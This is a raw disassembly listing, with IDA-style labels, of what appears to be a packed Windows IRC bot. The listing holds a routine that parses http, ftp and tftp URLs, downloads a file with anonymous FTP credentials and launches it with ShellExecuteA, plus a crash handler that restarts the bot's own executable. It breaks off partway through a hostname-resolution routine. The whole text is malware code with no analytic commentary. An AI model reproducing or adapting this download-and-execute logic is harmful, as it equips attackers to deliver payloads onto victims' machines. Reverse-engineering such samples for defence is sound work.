; Attributes: bp-based frame
sub_402A32 proc near ; DATA XREF: sub_403260+BC�o
var_814 = qword ptr -814h
var_804 = qword ptr -804h
var_7FC = dword ptr -7FCh
var_7F8 = qword ptr -7F8h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_6D5 = byte ptr -6D5h
var_6D4 = byte ptr -6D4h
var_6CC = dword ptr -6CCh
var_6C8 = dword ptr -6C8h
var_6C4 = dword ptr -6C4h
var_6C0 = dword ptr -6C0h
var_6BC = byte ptr -6BCh
var_6BB = byte ptr -6BBh
var_63C = dword ptr -63Ch
var_638 = byte ptr -638h
var_637 = byte ptr -637h
var_632 = byte ptr -632h
var_631 = byte ptr -631h
var_534 = byte ptr -534h
var_430 = byte ptr -430h
var_2A8 = byte ptr -2A8h
var_2A7 = byte ptr -2A7h
var_2A6 = byte ptr -2A6h
var_2A3 = byte ptr -2A3h
var_296 = byte ptr -296h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = byte ptr -284h
var_283 = byte ptr -283h
var_204 = byte ptr -204h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 804h
push edi
push 3AFh
push [ebp+arg_0]
lea eax, [ebp+var_63C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_7DC]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
and [ebp+var_288], 0
mov [ebp+var_28C], 1
and [ebp+var_6CC], 0
mov al, byte_41DEC0
mov [ebp+var_284], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_283]
rep stosd
stosw
stosb
mov al, byte_41DEC0
mov [ebp+var_6BC], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_6BB]
rep stosd
stosw
stosb
and [ebp+var_6C8], 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_4185CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 14h
push 7
push offset dword_4185C4
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_402B93
push 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_631]
push eax
call dword_417060 ; CopyFileA
test eax, eax
jnz short loc_402B8E
call dword_417064 ; RtlGetLastWin32Error
cmp eax, 20h
jnz short loc_402B58
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41858C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_402B7B
; ---------------------------------------------------------------------------
loc_402B58: ; CODE XREF: sub_402A32+FF�j
lea eax, [ebp+var_631]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41855C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_402B7B: ; CODE XREF: sub_402A32+124�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402B8E: ; CODE XREF: sub_402A32+F4�j
jmp loc_403256
; ---------------------------------------------------------------------------
loc_402B93: ; CODE XREF: sub_402A32+D6�j
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402BB5
; ---------------------------------------------------------------------------
loc_402BA8: ; CODE XREF: sub_402A32:loc_402CD8�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402BB5: ; CODE XREF: sub_402A32+174�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402CDD
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 3Ah
jnz loc_402CD8
mov [ebp+var_7E0], 1
jmp short loc_402BF2
; ---------------------------------------------------------------------------
loc_402BE5: ; CODE XREF: sub_402A32:loc_402CD3�j
mov eax, [ebp+var_7E0]
inc eax
mov [ebp+var_7E0], eax
loc_402BF2: ; CODE XREF: sub_402A32+1B1�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
test eax, eax
jz short loc_402C23
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 2Fh
jnz short loc_402C7A
loc_402C23: ; CODE XREF: sub_402A32+1D6�j
mov eax, [ebp+var_7E0]
and [ebp+eax+var_6D5], 0
lea eax, [ebp+var_6D4]
push eax
call sub_40422A
pop ecx
test eax, eax
jz short loc_402C75
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
add eax, [ebp+var_7E0]
push eax
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6C8], 1
loc_402C75: ; CODE XREF: sub_402A32+20E�j
jmp loc_403251
; ---------------------------------------------------------------------------
loc_402C7A: ; CODE XREF: sub_402A32+1EF�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 30h
jl short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 39h
jg short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
mov ecx, [ebp+var_7E0]
mov al, [ebp+eax+var_638]
mov [ebp+ecx+var_6D5], al
jmp short loc_402CD3
; ---------------------------------------------------------------------------
loc_402CCE: ; CODE XREF: sub_402A32+25F�j
; sub_402A32+278�j
jmp loc_40324C
; ---------------------------------------------------------------------------
loc_402CD3: ; CODE XREF: sub_402A32+29A�j
jmp loc_402BE5
; ---------------------------------------------------------------------------
loc_402CD8: ; CODE XREF: sub_402A32+1A1�j
jmp loc_402BA8
; ---------------------------------------------------------------------------
loc_402CDD: ; CODE XREF: sub_402A32+18A�j
; sub_402A32:loc_40324C�j ...
push 7
push offset aHttp ; "http://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402D37
cmp [ebp+var_6C8], 0
jnz short loc_402D13
push offset a80 ; "80"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_402D13: ; CODE XREF: sub_402A32+2CC�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6CC], 1
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: sub_402A32+2C3�j
push 6
push offset aFtp ; "ftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402DB7
cmp [ebp+var_6C8], 0
jnz short loc_402D6D
push offset a21 ; "21"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_402D6D: ; CODE XREF: sub_402A32+326�j
lea eax, [ebp+var_632]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6CC], 2
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_284]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_6BC]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402DB7: ; CODE XREF: sub_402A32+31D�j
push 7
push offset aTftp ; "tftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402E0E
cmp [ebp+var_6C8], 0
jnz short loc_402DED
push offset a69 ; "69"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_402DED: ; CODE XREF: sub_402A32+3A6�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov [ebp+var_6CC], 3
jmp short loc_402E3D
; ---------------------------------------------------------------------------
loc_402E0E: ; CODE XREF: sub_402A32+39D�j
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_418500
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402E3D: ; CODE XREF: sub_402A32+300�j
; sub_402A32+380�j ...
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402E5F
; ---------------------------------------------------------------------------
loc_402E52: ; CODE XREF: sub_402A32:loc_402F11�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402E5F: ; CODE XREF: sub_402A32+41E�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402F16
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 40h
jnz loc_402F11
mov eax, [ebp+var_6C0]
and [ebp+eax+var_638], 0
push offset asc_4184FC ; ":"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_7E4], eax
cmp [ebp+var_7E4], 0
jz short loc_402ED8
mov eax, [ebp+var_7E4]
and byte ptr [eax], 0
push 80h
mov eax, [ebp+var_7E4]
inc eax
push eax
lea eax, [ebp+var_6BC]
push eax
call sub_407A56
add esp, 0Ch
loc_402ED8: ; CODE XREF: sub_402A32+47F�j
push 80h
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_284]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_637]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_402F16
; ---------------------------------------------------------------------------
loc_402F11: ; CODE XREF: sub_402A32+44B�j
jmp loc_402E52
; ---------------------------------------------------------------------------
loc_402F16: ; CODE XREF: sub_402A32+434�j
; sub_402A32+4DD�j
push offset asc_4184F8 ; "/"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_288], eax
cmp [ebp+var_288], 0
jnz short loc_402F67
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_4184CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402F67: ; CODE XREF: sub_402A32+504�j
mov eax, [ebp+var_288]
inc eax
push eax
lea eax, [ebp+var_204]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_288]
and byte ptr [eax], 0
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp-6D8h], eax
and [ebp+var_6C4], 0
cmp [ebp+var_6CC], 1
jnz short loc_403009
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402698
add esp, 24h
mov [ebp+var_28C], eax
loc_403009: ; CODE XREF: sub_402A32+582�j
cmp [ebp+var_6CC], 2
jnz short loc_403065
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402A24
add esp, 24h
mov [ebp+var_28C], eax
loc_403065: ; CODE XREF: sub_402A32+5DE�j
cmp [ebp+var_6CC], 3
jnz short loc_4030B3
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
call sub_402A2B
add esp, 1Ch
mov [ebp+var_28C], eax
loc_4030B3: ; CODE XREF: sub_402A32+63A�j
; sub_402A32:loc_403256�j
cmp [ebp+var_28C], 1
jnz loc_403219
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4030D7
mov [ebp+var_7EC], offset dword_4184C0
jmp short loc_403104
; ---------------------------------------------------------------------------
loc_4030D7: ; CODE XREF: sub_402A32+697�j
movsx eax, [ebp+var_2A6]
test eax, eax
jz short loc_4030EE
mov [ebp+var_7F0], offset dword_4184B4
jmp short loc_4030F8
; ---------------------------------------------------------------------------
loc_4030EE: ; CODE XREF: sub_402A32+6AE�j
mov [ebp+var_7F0], offset byte_41DEC0
loc_4030F8: ; CODE XREF: sub_402A32+6BA�j
mov eax, [ebp+var_7F0]
mov [ebp+var_7EC], eax
loc_403104: ; CODE XREF: sub_402A32+6A3�j
push [ebp+var_7EC]
mov eax, [ebp+var_6C4]
shr eax, 0Ah
mov dword ptr [ebp+var_7F8], eax
and dword ptr [ebp+var_7F8+4], 0
fild [ebp+var_7F8]
fstp [ebp+var_7FC]
call sub_416B64 ; clock
sub eax, [ebp-6D8h]
mov dword ptr [ebp+var_804], eax
and dword ptr [ebp+var_804+4], 0
fild [ebp+var_804]
fdiv flt_417270
fdivr [ebp+var_7FC]
push ecx
push ecx
fstp [esp+814h+var_814]
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41846C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_2A7]
test eax, eax
jz short loc_403198
lea eax, [ebp+var_534]
push eax
call dword_4170AC ; DeleteFileA
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_403198: ; CODE XREF: sub_402A32+755�j
movsx eax, [ebp+var_2A6]
test eax, eax
jnz short loc_4031AE
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_403217
loc_4031AE: ; CODE XREF: sub_402A32+76F�j
movsx eax, [ebp+var_2A3]
neg eax
sbb eax, eax
inc eax
push eax
push 0
push 0
lea eax, [ebp+var_534]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0 ; ShellExecuteA
mov [ebp+var_7E8], eax
cmp [ebp+var_7E8], 20h
jbe short loc_4031F4
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4031F2
call sub_407148
loc_4031F2: ; CODE XREF: sub_402A32+7B9�j
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_4031F4: ; CODE XREF: sub_402A32+7AE�j
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418444
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_403217: ; CODE XREF: sub_402A32+764�j
; sub_402A32+77A�j ...
jmp short loc_40323C
; ---------------------------------------------------------------------------
loc_403219: ; CODE XREF: sub_402A32+688�j
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418414
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_40323C: ; CODE XREF: sub_402A32:loc_403217�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_40325B
; ---------------------------------------------------------------------------
loc_40324C: ; CODE XREF: sub_402A32:loc_402CCE�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403251: ; CODE XREF: sub_402A32:loc_402C75�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403256: ; CODE XREF: sub_402A32:loc_402B8E�j
jmp loc_4030B3
; ---------------------------------------------------------------------------
loc_40325B: ; CODE XREF: sub_402A32+157�j
; sub_402A32+406�j ...
pop edi
leave
retn 4
sub_402A32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403260 proc near ; CODE XREF: sub_40A9CF+959�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_4], 0
jnz short loc_403271
jmp locret_403329
; ---------------------------------------------------------------------------
loc_403271: ; CODE XREF: sub_403260+A�j
push 3AFh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_40328A
jmp locret_403329
; ---------------------------------------------------------------------------
loc_40328A: ; CODE XREF: sub_403260+23�j
push 8
push 7Ah
push 61h
push 4
lea eax, [ebp+var_10]
push eax
call sub_410501
add esp, 14h
and [ebp+eax+var_10], 0
push offset dword_418620
lea eax, [ebp+var_10]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jnz short loc_4032BF
lea eax, [ebp+var_10]
mov [ebp+arg_8], eax
loc_4032BF: ; CODE XREF: sub_403260+57�j
push 104h
push [ebp+arg_4]
mov eax, [ebp+var_14]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_14]
add eax, 108h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_14]
add eax, 20Ch
push eax
call sub_405F67
pop ecx
pop ecx
mov eax, [ebp+var_14]
add eax, 108h
push eax
mov eax, [ebp+var_14]
add eax, 4
push eax
push offset dword_4185FC
push 0
push [ebp+var_14]
push offset sub_402A32
call sub_4095A4
add esp, 18h
locret_403329: ; CODE XREF: sub_403260+C�j
; sub_403260+25�j
leave
retn
sub_403260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40332B proc near ; CODE XREF: sub_4093B6+A0�p
; sub_4094E6+9B�p ...
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 114h
push 1
push offset dword_41DECC
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp dword_41DEC8, 0
jz loc_4034D9
mov [ebp+var_8], offset aException_othe ; "EXCEPTION_OTHER"
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_110], eax
cmp [ebp+var_110], 0C0000025h
ja short loc_4033A4
cmp [ebp+var_110], 0C0000025h
jz short loc_4033FA
cmp [ebp+var_110], 80000003h
jz short loc_4033DF
cmp [ebp+var_110], 0C0000005h
jz short loc_4033D6
cmp [ebp+var_110], 0C000001Dh
jz short loc_4033E8
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033A4: ; CODE XREF: sub_40332B+45�j
cmp [ebp+var_110], 0C000008Dh
jb short loc_403413
cmp [ebp+var_110], 0C0000093h
jbe short loc_40340C
cmp [ebp+var_110], 0C0000094h
jz short loc_4033F1
cmp [ebp+var_110], 0C00000FDh
jz short loc_403403
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033D6: ; CODE XREF: sub_40332B+69�j
mov [ebp+var_8], offset aException_acce ; "EXCEPTION_ACCESS_VIOLATION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: sub_40332B+5D�j
mov [ebp+var_8], offset aException_brea ; "EXCEPTION_BREAKPOINT"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033E8: ; CODE XREF: sub_40332B+75�j
mov [ebp+var_8], offset aException_ille ; "EXCEPTION_ILLEGAL_INSTRUCTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033F1: ; CODE XREF: sub_40332B+9B�j
mov [ebp+var_8], offset aException_int_ ; "EXCEPTION_INT_DIVIDE_BY_ZERO"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033FA: ; CODE XREF: sub_40332B+51�j
mov [ebp+var_8], offset aException_nonc ; "EXCEPTION_NONCONTINUABLE_EXCEPTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_403403: ; CODE XREF: sub_40332B+A7�j
mov [ebp+var_8], offset aException_stac ; "EXCEPTION_STACK_OVERFLOW"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_40340C: ; CODE XREF: sub_40332B+8F�j
mov [ebp+var_8], offset aException_flt ; "EXCEPTION_FLT"
loc_403413: ; CODE XREF: sub_40332B+77�j
; sub_40332B+83�j ...
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_40342A
mov [ebp+var_114], offset aRestarting ; "Restarting"
jmp short loc_403434
; ---------------------------------------------------------------------------
loc_40342A: ; CODE XREF: sub_40332B+F1�j
; DATA XREF: .RLPack:0042FA47�r ...
mov [ebp+var_114], offset aContinuing ; "Continuing"
loc_403434: ; CODE XREF: sub_40332B+FD�j
push [ebp+var_114]
loc_40343A:
push [ebp+var_8]
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
mov eax, [ebp+var_4]
inc eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41864C
push offset dword_41DB3C
call sub_40D4AB
add esp, 48h
loc_4034D9: ; CODE XREF: sub_40332B+21�j
mov eax, [ebp+var_4]
inc eax
cmp eax, 64h
jz short loc_4034ED
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_403558
loc_4034ED: ; CODE XREF: sub_40332B+1B5�j
push 104h
lea eax, [ebp+var_10C]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
test eax, eax
jz short loc_403545
push 0
push 0
push 0
lea eax, [ebp+var_10C]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0 ; ShellExecuteA
cmp eax, 20h
ja short loc_403538
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp short loc_403543
; ---------------------------------------------------------------------------
loc_403538: ; CODE XREF: sub_40332B+1FE�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403543: ; CODE XREF: sub_40332B+20B�j
jmp short loc_403550
; ---------------------------------------------------------------------------
loc_403545: ; CODE XREF: sub_40332B+1DF�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403550: ; CODE XREF: sub_40332B:loc_403543�j
; DATA XREF: sub_42E43F+121�w ...
push 0
call dword_41705C ; ExitProcess
loc_403558: ; CODE XREF: sub_40332B+1C0�j
; DATA XREF: sub_42E43F+F8�r
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 80000003h
jnz short loc_403583
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov eax, [eax+0B8h]
inc eax
mov ecx, [ebp+arg_0]
mov ecx, [ecx+4]
mov [ecx+0B8h], eax
or eax, 0FFFFFFFFh
jmp short locret_403586
; ---------------------------------------------------------------------------
loc_403583: ; CODE XREF: sub_40332B+238�j
push 1
pop eax
locret_403586: ; CODE XREF: sub_40332B+256�j
leave
retn
sub_40332B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403588 proc near ; DATA XREF: sub_403BD3:loc_403D85�o
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 48h
cmp [ebp+arg_8], 0
jz short loc_4035E2
loc_403594: ; DATA XREF: sub_42E43F+106�r
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 0
jz short loc_4035BB
mov eax, [ebp+arg_8]
loc_4035A0: ; DATA XREF: sub_4300B6+BD�r
cmp dword ptr [eax+4], 2
loc_4035A4: ; DATA XREF: .RLPack:0042EC82�r
jz short loc_4035BB
push 273Fh
call dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035BB: ; CODE XREF: sub_403588+13�j
; sub_403588:loc_4035A4�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 1
jz short loc_4035E2
loc_4035C4: ; DATA XREF: sub_4305F2+13�r
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 2
jz short loc_4035E2
push 273Ch
call dword_417234 ; WSASetLastError
loc_4035D8: ; DATA XREF: sub_42E43F+248�r
; .RLPack:0042ECFA�r
mov eax, 273Ch
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035E2: ; CODE XREF: sub_403588+A�j
; sub_403588+3A�j ...
cmp [ebp+arg_0], 0
jnz loc_4036D6
push 30h
call sub_416B46 ; malloc
pop ecx
loc_4035F4: ; DATA XREF: sub_42EC3D+2D�r
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jnz short loc_40360D
push 8
call dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40360D: ; CODE XREF: sub_403588+73�j
push 30h
push 0
push [ebp+var_34]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_30]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_30], 2
cmp [ebp+arg_4], 0
jz short loc_40364C
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; ntohs
mov [ebp+var_2E], ax
loc_40364C: ; CODE XREF: sub_403588+AE�j
mov eax, [ebp+var_34]
mov dword ptr [eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_403667
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_38], eax
jmp short loc_40366E
; ---------------------------------------------------------------------------
loc_403667: ; CODE XREF: sub_403588+D2�j
mov [ebp+var_38], 1
loc_40366E: ; CODE XREF: sub_403588+DD�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
mov [eax+8], ecx
cmp [ebp+arg_8], 0
jz short loc_403688
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_3C], eax
jmp short loc_40368F
; ---------------------------------------------------------------------------
loc_403688: ; CODE XREF: sub_403588+F3�j
mov [ebp+var_3C], 6
loc_40368F: ; CODE XREF: sub_403588+FE�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_3C]
mov [eax+0Ch], ecx
mov eax, [ebp+var_34]
mov dword ptr [eax+10h], 10h
mov eax, [ebp+var_34]
add eax, 20h
mov ecx, [ebp+var_34]
mov [ecx+18h], eax
and [ebp+var_2C], 0
push 10h
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_34]
add eax, 20h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
mov [eax], ecx
xor eax, eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036D6: ; CODE XREF: sub_403588+5E�j
push [ebp+arg_0]
call dword_41723C ; gethostbyname
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4036F2
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036F2: ; CODE XREF: sub_403588+15E�j
and [ebp+var_20], 0
jmp short loc_4036FF
; ---------------------------------------------------------------------------
loc_4036F8: ; CODE XREF: sub_403588+18C�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4036FF: ; CODE XREF: sub_403588+16E�j
cmp [ebp+var_14], 0
jz short loc_403716
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_20]
cmp dword ptr [eax+ecx*4], 0
jz short loc_403716
jmp short loc_4036F8
